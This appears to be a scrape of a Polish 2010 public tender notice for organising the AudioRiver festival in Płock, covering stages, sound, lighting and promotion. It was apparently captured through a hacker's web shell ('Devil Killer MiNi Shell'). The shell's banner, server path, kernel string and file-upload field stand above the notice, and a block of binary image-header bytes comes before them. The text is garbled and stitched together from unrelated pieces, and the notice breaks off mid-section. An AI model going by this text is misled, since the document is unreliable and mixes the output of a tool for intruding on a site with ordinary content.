JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100409/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100409/100758-N-2010.html

<p class="kh_header"><b>Płock: Organizacja imprezy plenerowej - AudioRiver 2010 Festiwal Świata Niezależnego</b><br>
<b>Numer ogłoszenia: 100758 - 2010; data zamieszczenia: 09.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Ośrodek Kultury i Sztuki , ul. Tumska 9, 09-402 Płock, woj. mazowieckie, tel. 0-24 367 19 20, faks 0-24 367 19 20 wew. 32.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja imprezy plenerowej - AudioRiver 2010 Festiwal Świata Niezależnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja imprezy plenerowej na plaży nad Wisłą oraz Rynku Starego Miasta w Płocku, pod nazwą Festiwal Świata Niezależnego AudioRiver 2010 w dniach  06, 07, 08 sierpnia 2010 roku.

W zakres organizacji wchodzi

I)	Organizacja imprezy masowej pod nazwą Festiwal Świata Niezależnego AudioRiver 2010         w dniach 06, 07, 08 sierpnia 2010 roku na terenie plaży nad Wisłą w Płocku oraz Rynku Starego Miasta w Płocku pod względem formalno - prawnym zgodnie z Ustawą z dnia                20 marca 2009 roku o bezpieczeństwie imprez masowych (Dz.U. z 21 kwietnia 2009 roku, Nr 62,  poz. 504).
- terminowe pozyskanie niezbędnych opinii służb miejskich miasta Płocka
- zezwolenia Prezydenta Miasta Płocka na przeprowadzenie imprezy masowej
- ubezpieczenie imprezy masowej.

II)	Organizacja imprezy głównej biletowanej na terenie plaży nad Wisłą w Płocku  w dniach               06, 07 sierpnia 2010 roku.

III)	Organizacja imprezy towarzyszącej niebiletowanej na terenie Rynku Starego Miasta                        w Płocku w dniach 07, 08 sierpnia 2010 roku.

IV)	Zabezpieczenie imprezy pod nazwą Festiwal Świata Niezależnego AudioRiver 2010                   w dniach 06, 07, 08 sierpnia 2010 roku na terenie plaży nad Wisłą w Płocku oraz Rynku Starego Miasta  w Płocku zgodnie z Ustawy z dnia 20 marca 2009 roku o bezpieczeństwie imprez masowych (Dz.U. z 21 kwietnia 2009 roku, Nr 62, poz. 504).
- zabezpieczenie imprezy pod względem bezpieczeństwa osób i mienia
- zabezpieczenie medyczne zgodne z zaleceniami Wojewódzkiej Stacji Pogotowia    
  Ratunkowego i Transportu Sanitarnego w Płocku
- zabezpieczenie imprezy pod względem higieniczno - sanitarnym zgodnym z   
  zaleceniami Państwowego Inspektora Sanitarnego w Płocku
- zabezpieczenie przeciwpożarowe zgodne z zaleceniami Państwowej Straży 
  Pożarnej w Płocku

V)	Organizacja koncertów na poszczególnych scenach zgodnie z poniższym planem czasowym

1. Plaża nad Wisłą w Płocku - impreza biletowana
Scena Main
06.08.2010 r. - czas trwania koncertów od 19.30 do 6.00 (07.08.2010 r.)
07.08.2010 r. - czas trwania koncertów od 19.30 do 6.00 (08.08.2010 r.)
	Scena 2 
06.08.2010 r. - czas trwania koncertów od 19.00 do 7.00 (07.08.2010 r.)
07.08.2010 r. - czas trwania koncertów od 19.00 do 7.00 (08.08.2010 r.)
Scena 3
06.08.2010 r. - czas trwania koncertów od 19.00 do 7.00 (07.08.2010 r.)
07.08.2010 r. - czas trwania koncertów od 19.00 do 7.00 (08.08.2010 r.)
Scena 4
06.08.2010 r. - czas trwania koncertów od 19.00 do 7.00 (07.08.2010 r.)
07.08.2010 r. - czas trwania koncertów od 19.00 do 7.00 (08.08.2010 r.)

2. Rynek Starego Miasta w Płocku - imprezy niebiletowane

City Stage
07.08.2010 roku - czas trwania imprezy minimum 6 godzin
08.08.2010 roku - czas trwania imprezy minimum 6 godzin



VI)	Zapewnienie wykonania koncertów gwiazd zagranicznych oraz polskich zgodnie                            z poniższym wykazem ilościowym artystów

1. Scena Mein
06.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
07.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
2. Scena 2
06.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
07.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
            3. Scena 3 
06.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
07.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
            4. Scena 4:
06.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
07.08.2010 roku - minimum 4 gwiazdy zagraniczne oraz minimum 3  polskich artystów
	
VII)	Zapewnienie przeprowadzenia na City Stage (również teren Rynku Starego Miasta w Płocku) warsztatów, targów muzycznych, wystaw oraz dodatkowych atrakcji

VIII)	Zapewnienie niezbędnej ilości artystów (gwiazd zagranicznych i polskich) w ilości zgodnej z zapisami par. VI pkt. 1 - 4. Lista proponowanych zespołów, które chcielibyśmy zaprosić

Ame, Aphex Twin, Beardyman, Beyond The Wizards Sleeve, Boards Of Kanada, Boys Noize, Carte Blanche (dj mehdi & riton ), Caspa, Chemical Brothers, Christian Smith, Commix, Deep Dish, Denki Groove, Dj Koze, Dusty Kid live, Ellen Allien, Florence and the Machine, Four Tet, Groove ArmadaHadouken ! Live, Hot Chip, Hybrid live, Imogen Heap , Justice, Karotte, Krazy Baldhead , La Roux ,Laurent Garnier , Lee Burridge , London Elektricity , M.A.N.D.Y, Martyn  , Massive Attack , Modeselector , Nero, Noisia, Pan-Pot, Pantha Du Prince, Passion pit, Plastikman live, Prins Thomas,Quemist, Reboot, SebastiAn, Shadow Dancer, Shapeshifter, Silens family live, Simian Mobile Disco 
Sub Focus, Sven Väth, The Knife, The Modern Deep Left Quartet, Underworld, Way Out West, Yuksek live, Prodigy


IX)	Zapewnienie techniki scenicznej (Main Stage)

1.	Profesjonalny, stabilny i odpowiednio zabezpieczony podest sceniczny o wymiarach minimum 12 m x 10 m i wysokości 2 m z podestów estradowych lub w systemie layher o powierzchni antypoślizgowej z barierkami zabezpieczającymi (z trzech stron)                           o wysokości minimalnej 1,2 m, zbudowany i zabezpieczony zgodnie z Polskimi Normami. 
2.	Aluminiowe, stabilne i odpowiednio zabezpieczone zadaszenie łukowe, pokryte ognioodpornym poszyciem, na wysokości minimum 7 m od poziomu sceny do frontowej, poziomej belki zadaszenia, podparte na czterech aluminiowych słupach w systemie layher, dopasowane do budowy sceny oraz nie zajmujące powierzchni sceny, zbudowany i zabezpieczony zgodnie z Polskimi Normami.
3.	Osłona sceny z trzech stron (horyzont oraz 2 boki) wykonana z ognioodpornego materiału w kolorze czarnym, posiadająca Atesty P.Poż
4.	Stabilne schody o szerokości minimum 2 m z barierkami zabezpieczającymi po obu stronach schodów o wysokości minimalnej 1,2 m i stopniami antypoślizgowymi zbudowany i zabezpieczony zgodnie z Polskimi Normami.
5.	Osłona podestu scenicznego (front i 2 boki) i podestów pod perkusję materiałem                     w kolorze czarnym
6.	Profesjonalny, stabilny, zadaszony, osłonięty z trzech stron i odpowiednio zabezpieczony podest dla realizatora systemu monitorowego o wymiarach minimum     6 m x 2 m                       i wysokości 2 m z podestów estradowych lub w systemie layher  o powierzchni anty poślizgowej z barierkami zabezpieczającymi (z trzech stron) o wysokości minimalnej                    1,2 m, ustawiony obok głównej sceny i nie zajmujący powierzchni sceny  zbudowany                 i zabezpieczony zgodnie z Polskimi Normami.
7.	Stabilne i odpowiednio zabezpieczone dwie wieże (zadaszone i osłonięte od frontu odpowiednią siatką która nie tłumi dźwięku) do podwieszenia systemu nagłośnieniowego o wymiarach minimum 2,5 m x 2,5 m i wysokości 11 m po obu stronach sceny wraz                  z podestami pod kolumny subbasowe o wymiarach minimum 2,5 m x 2,5 m i wysokości 0,2 m, zbudowany i zabezpieczony zgodnie z Polskimi Normami. Jeśli słupy od głównego zadaszenia będą w systemie layher zostaną one na pewno wykorzystane jako wieże              pod nagłośnienie, więc punkt 9 zostanie pominięty (dodatkowo belka do podwieszenia systemu nagłośnieniowego o minimalnej nośności 1.5 T - wymagany atst)
8.	Stabilny i odpowiednio zabezpieczone trzypoziomowe stanowisko dla realizatora nagłośnienia ( I poziom na wysokości minimum 0,3 m), oświetlenia ( II poziom                         na wysokości minimum 2,5 m) i wizji multimedialnej (III poziom na wysokości minimum                4,5 m),stanowisko wyposażony w pion komunikacyjny w postaci klatki schodowej,  zadaszone i osłonięte z trzech stron materiałem ognioodpornym oraz barierkami zabezpieczającymi z trzech stron   na każdym poziomie. Stanowisko   o wymiarach minimum 6 m x 3 m i wysokości 6,5 m. oraz ustawione w odległości 30 m od sceny oraz w osi sceny, zbudowany i zabezpieczony zgodnie z Polskimi Normami.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

X)	Zapewnienie niezbędnego backlin-u na potrzeby koncertów gwiazd zagranicznych oraz polskich. Bocklin musi być zgodny z wymogami technicznym zespołów.

XI)	Zapewnienie nagłośnienia scenicznego P.A. oraz systemu monitorowego (Main Stage)

1.	System P.A. renomowanych firm, preferowane L-ACOUSTICS V-DOSC lub MEYER SOUND MILO - Line Array Active System. Moc systemów P.A.  adekwatna                             do powierzchni terenu imprezy.
2.	System monitorowy zgodny z riderami technicznymi artystów preferowany d&b MAX, MEYER SOUND, TURBOSOUND.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XII)	Zapewnienie oświetlenia scenicznego (Main Stage)

1.	Oświetlenie sceniczne winno być zgodne z rider-ami technicznymi gwiazd  
                             zagrodniczych.
2.	Oświetlenie sceniczne nie winno być mniejsze niż

L.p.	Rodzaj urządzenia	Ilość	Uwagi
1.	Urządzenia inteligentne typu Mac 700	20 szt.	Urzędzenia nie gorszej jakości jak firmy Martin.
2.	Lampy profilowe typu PC 1000 W	10 szt.	Urzędzenia nie gorszej jakości jak firmy Griven.
3.	Oświetlenie efektowe publiczności (każda z 4 żarówkami)	8 szt.	Urzędzenia nie gorszej jakości jak firmy DTS.
4. 	Oświetlenie architektoniczne do wyświetlenia Wzgórza Tumskiego o minimalnej mocy 5000 W
Oraz oświetlenie terenu imprezy, terenu pola namiotowego o minimalne mocy 1000 w	5000 W - 3 szt.

1000 W PAR - 30 szt.	
5.	Urządzenia inteligentne typu Mac 500	20 szt.	Urzędzenia nie gorszej jakości jak firmy Martin.
6.	Światło administracyjne zaplecza scenicznego o minimalnej mocy 500 W każda	8 punktów świetlnych	Punkty świetlne ustalone zostaną przez Zleceniodawcę.
	Tabela nr 1: Tablica oświetlenia scenicznego

3.  Pozostały sprzęt, niezbędny do realizacji i obsługi technicznej w/w oświetlenia należy do wyboru oferenta, ale spełniający odpowiednie wymogi i spełniający Polskie Normy, czyli pełne okablowanie (piony, DMX, kable sieciowe itd.), sterownik oświetlenia, końcówki mocy (dimmery) i ewentualne dodatkowe trawersy do podwieszenia oświetlenia.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.


XIII)	Zapewnienie hali namiotowej oraz techniki scenicznej (Scena 2)
1.	Profesjonalna, stabilna i odpowiednio zabezpieczona hala namiotowa o  
powierzchni minimum 2500 mkw bez podłogi, zbudowana zgodnie z Polskimi  Normami.
2.	Hala namiotowa wyposażona w
- podest sceniczny o minimalnych wymiarach 10 x 8 x 0,5 [m]
- nagłośnienie sceniczne P.A. renomowanej firmy oraz odpowiedniej mocy oraz  
  nagłośnienie monitorowe. Nagłośnienie zgodne z rider-ami technicznymi artystów.
- oświetlenie sceniczne oraz efektowe w postaci minimum
   20 szt. PAR 64 - 1000 W
4 szt. urządzeń inteligentnych nie gorszej jakości niż typu MAC 500
- Ekran diodowy o minimalnej powierzchni 30 mkw. do wyświetlania wizualizacji.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XIV)	Zapewnienie hali namiotowej oraz techniki scenicznej (Scena 3)
1.	Profesjonalna, stabilna i odpowiednio zabezpieczona hala namiotowa o  
powierzchni minimum 1500 mkw bez podłogi, zbudowana zgodnie z Polskimi  Normami.
2.	Hala namiotowa wyposażona w 
- podest sceniczny o minimalnych wymiarach 10 x 8 x 0,5 [m]
- nagłośnienie sceniczne P.A. renomowanej firmy oraz odpowiedniej mocy oraz  
  nagłośnienie monitorowe. Nagłośnienie zgodne z rider-ami technicznymi artystów.
- oświetlenie sceniczne oraz efektowe w postaci minimum
   20 szt. PAR 64 - 1000 W
6 szt. urządzeń inteligentnych nie gorszej jakości niż typu MAC 500
- Dwa projektory multimedialne o minimalnej mocy 5000 Ansli Lumenów do  
  wyświetlania wizualizacji puszczanych z komputera.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XV)	Zapewnienie hali namiotowej oraz techniki scenicznej (Scena 4)
1.	Profesjonalna, stabilna i odpowiednio zabezpieczona hala namiotowa o  
powierzchni minimum 400 mkw z podłogą, zbudowana zgodnie z Polskimi  Normami.
2.	Hala namiotowa wyposażona w 
- podest sceniczny o minimalnych wymiarach 10 x 8 x 0,5 [m]
- nagłośnienie sceniczne P.A. renomowanej firmy oraz odpowiedniej mocy oraz  
  nagłośnienie monitorowe. Nagłośnienie zgodne z rider-ami technicznymi artystów.
- oświetlenie sceniczne oraz efektowe w postaci minimum:
   20 szt. PAR 64 - 1000 W
6 szt. urządzeń inteligentnych nie gorszej jakości niż typu MAC 500
- Dwa projektory multimedialne o minimalnej mocy 5000 Ansli Lumenów do  
  wyświetlania wizualizacji puszczanych z komputera.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XVI)	Agregaty prądotwórcze (Main Stage, sceny 2, 3, 4, namioty VIP oraz Art Lunch)
- Ilośc oraz moc agregatów prądotwórczych odpowiednia oraz umożliwiająca stałe zasilenie całej techniki imprezy.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XVII)	Zapewnienie wyposażenia zaplecza scenicznego

1.	Garderoby: minimum 6 stabilnych, profesjonalnych namiotów przeznaczonych na garderoby dla artystów o wymiarach minimum 5m x 5m i wysokości  2,3m, z równą, antypoślizgową podłogą i wyposażeniem w każdej garderobie w postaci
-	10 stabilnych krzeseł z oparciem
-	1 sofa do wypoczynku
-	1 stabilny stół o wymiarach minimum 0,9m x 0,9m i wysokości 0,9m
-	1 punkt świetlny dobrze oświetlający całą garderobę 
-	1 lustro o wymiarach minimum 0,3m x 1m
-	1 wieszak stojący
-     1 chłodziarka do napojów
2.	Namiot ArtLunch o minimalnej powierzchni 100 mkw z podłogą i minimalnym wyposażeniem w postaci
      -     stoły i krzesła dla 100 osób 
      -     stół szwedzki dla cateringu
      -     wewnętrzne oświetlenie namiotu
	-    sofy do wypoczynku
3.	Namiot VIP o minimalnej powierzchni 300 mkw z podłogą i minimalnym wyposażeniem w postaci
      -     stoły i krzesła dla 100 osób
      -     stół szwedzki dla cateringu
      -     wewnętrzne oświetlenie namiotu
      -     sofy do wypoczynku
4.	Oświetlenie zaplecza scenicznego minimum 5 punktów świetlnych.
5.	Utwardzenie dojść od głównej drogi do sceny, namiotów ArtLunch i VIP oraz garderób i TOI - TOI w postaci płyt typu plastry miodu lub podestów scenicznych.                    Dojścia o minimalnej szerokości 1,5 [m].

Uwaga  wszystkie w/w urządzenia (6 garderób) winny posiada wszelkie atesty.

XVIII)	Zapewnienie multimediów (Main Stage)
1.	Ekrany diodowe o minimalnej powierzchni 40mkw ustawiony na horyzoncie sceny
2.	Ekrany diodowe o minimalnej powierzchni 20 mkw ustawione po obu bokach sceny .    
      Ekrany winny mieć: odpowiednią rozdzielczość tak aby obraz był czytelny z odległości  
      minimum 10 [m], konstrukcje do montażu
3.  Obsługa kamerowa w postaci minimum 2 kamer
4.  Realizacja  wizualizacji.
5. Obsługa i realizacja wizji z kamer oraz z wizualizacji na ekrany diodowe.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.
XIX)	Zapewnienie hali namiotowej oraz techniki scenicznej (Namiot System Dźwięku)
1.	Profesjonalna, stabilna i odpowiednio zabezpieczona hala namiotowa o  
powierzchni minimum 300 mkw bez podłogi, zbudowana zgodnie z Polskimi  Normami.
2.	Hala namiotowa wyposażona w 
- podest sceniczny o minimalnych wymiarach 8 x 6 x 0,5 [m]
- nagłośnienie sceniczne P.A. renomowanej firmy oraz odpowiedniej mocy oraz 
  monitorowe. Nagłośnienie zgodne z rider-ami technicznymi artystów.
- oświetlenie sceniczne oraz efektowe w postaci minimum
   20 szt. PAR 64 - 1000 W
8 szt. urządzeń inteligentnych nie gorszej jakości niż typu MAC 500
- Ekran diodowy o minimalnych wymiarach 4 x 3 [m] lub dwa projektory multimedialne   
  o minimalnej mocy 5000 Ansli Lumenów do wyświetlania wizualizacji puszczanych z   
  komputera.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.


XX)	Adaptacja terenu rezerwowego z możliwością rozbicia namiotu dla minimum 2000 osób
1.	Zapewnienie odpowiednich warunków sanitarno - higienicznych
2.	Namiot do rejestracji osób śpiących na polu namiotowym.

XXI)	Promocja Festiwalu
1.	Wykonanie projektu plakatu, zaproszenia, biletu, billboardu, ulotek. Projekt w pełnym   kolorze
2.	Wydruki poligraficzne
- plakat w formacie minimum B2 oraz gramatury 200 kreda w ilości 2000 szt.
- ulotki reklamowe w formacie minimum B6 oraz gramatury 170g  w ilości 100.000 szt.
- zaproszenia w formacie DL  w minimalnej ilości 200 szt. 
- billboardy (na nośniki reklamowe min. w Płocku, Warszawie, Wrocławiu, Krakowie, Poznaniu, Olsztynie, Toruniu itp.)
3.	Ekspozycja plakatów w miastach: Warszawa, Łódź, Toruń, Kraków, Wrocław, Trójmiasto, Poznań,  Olsztyn, Lublin itp. (minimum 10 największych miast w Polsce)
4.	Kolportaż ulotek na terenie całej Polski w 10 największych miast Polski
5.	Pozyskanie patronów medialnych (typu: TV, Radio, Prasa, Internet)
6.	Nagranie radiowych spotów reklamowych oraz ich emisja w stacjach regionalnych Płocka lub ogólno polskich
7.	Zapewnienie umieszczenia banerów reklamowych na stronach internetowych o tematyce muzycznej

XXII)	Technika sceniczna (City Stage).
1.	Profesjonalny, stabilny i odpowiednio zabezpieczony podest sceniczny o wymiarach minimum 6 m x 6 m i wysokości 1m z podestów estradowych lub w systemie layher o powierzchni anty poślizgowej z barierkami zabezpieczającymi (z trzech stron) o wysokości minimalnej 1,2 m, zbudowany i zabezpieczony zgodnie z Polskimi Normami. 
2.	Aluminiowe, stabilne i odpowiednio zabezpieczone zadaszenie, pokryte ognioodpornym poszyciem, na wysokości minimum 7 m od poziomu sceny do frontowej, poziomej belki zadaszenia, podparte na czterech aluminiowych słupach w systemie layher, dopasowane do budowy sceny oraz nie zajmujące powierzchni sceny, zbudowany i zabezpieczony zgodnie z Polskimi Normami.
3.	Osłona sceny z trzech stron (horyzont oraz 2 boki) wykonana z ognioodpornego materiału w kolorze czarnym, posiadająca Atesty P.Poż
4.	Stabilne schody o szerokości minimum 2 m z barierkami zabezpieczającymi po obu stronach schodów o wysokości minimalnej 1,2 m i stopniami anty poślizgowymi zbudowany i zabezpieczony zgodnie z Polskimi Normami.
5.	Osłona podestu scenicznego (front i 2 boki) i podestów pod perkusję materiałem w kolorze czarnym
6.	Profesjonalny, stabilny, zadaszony, osłonięty z trzech stron i odpowiednio zabezpieczony podest dla realizatora systemu monitorowego o wymiarach minimum     3 m x 2 m i wysokości 1,5 m z podestów estradowych lub w systemie layher  o powierzchni anty poślizgowej z barierkami zabezpieczającymi (z trzech stron) o wysokości minimalnej 1,2 m, ustawiony obok głównej sceny i nie zajmujący powierzchni sceny  zbudowany i zabezpieczony zgodnie z Polskimi Normami.
7.	Stabilne i odpowiednio zabezpieczone dwie wieże (zadaszone i osłonięte od frontu odpowiednią siatką która nie tłumi dźwięku) do podwieszenia systemu nagłośnieniowego o wymiarach minimum 2,5 m x 2,5 m i wysokości 11 m po obu stronach sceny wraz z podestami pod kolumny subbasowe o wymiarach minimum 2,5 m x 2,5 m i wysokości 0,2 m, zbudowany i zabezpieczony zgodnie z Polskimi Normami. Jeśli słupy od głównego zadaszenia będą w systemie layher zostaną one na pewno wykorzystane jako wieże pod nagłośnienie, więc punkt 9 zostanie pominięty (dodatkowo belka do podwieszenia systemu nagłośnieniowego o minimalnej nośności 1.5 T - wymagany atst)
8.	Stabilny i odpowiednio zabezpieczone stanowisko dla realizatora nagłośnienia, oświetlenia i multimedii,  zadaszone i osłonięte z trzech stron materiałem ognioodpornym. Stanowisko   o wymiarach minimum 6 m x 3 m oraz ustawione w odległości 30 m od sceny oraz w osi sceny, zbudowany i zabezpieczony zgodnie z Polskimi Normami.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej.

XXIII)	Nagłośnienie sceniczne (City Stage)
1.	System P.A. renomowanych firm i nie gorszej jakości niż JBL, Electrovoice, EAW. Moc systemów P.A.  adekwatna do powierzchni terenu imprezy;
2.	System monitorowy zgodny z riderami technicznymi.

XXIV)	Oświetlenie sceniczna (City Reggae Stage)

1.	Oświetlenie sceniczne winno być zgodne z riderami technicznymi gwiazd zagranicznych.
2.	Oświetlenie sceniczne winno być nie mniejsze niż

L.p.	Rodzaj urządzenia	Ilość	Uwagi
1.	Lampy typu PAR 64	20 szt.	Urzędzenia nie gorszej jakości jak firmy DTS.
	Tabela nr 1: Tablica oświetlenia scenicznego

3.	Pozostały sprzęt niezbędny do realizacji i obsługi technicznej w/w oświetlenia należy do wyboru oferenta, ale spełniający odpowiednie wymogi i spełniający Polskie Normy, czyli: pełne okablowanie (piony, DMX, kable sieciowe itd.), sterownik oświetlenia, końcówki mocy (dimmery) i ewentualne dodatkowe trawersy do podwieszenia oświetlenia.

Uwaga  wszystkie w/w urządzenia winny posiadać aktualne atesty dopuszczające do użytku na terenie Unii Europejskiej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.31.20.00-1, 92.31.21.20-8, 92.31.21.30-1, 92.31.22.50-8, 92.37.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 06.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
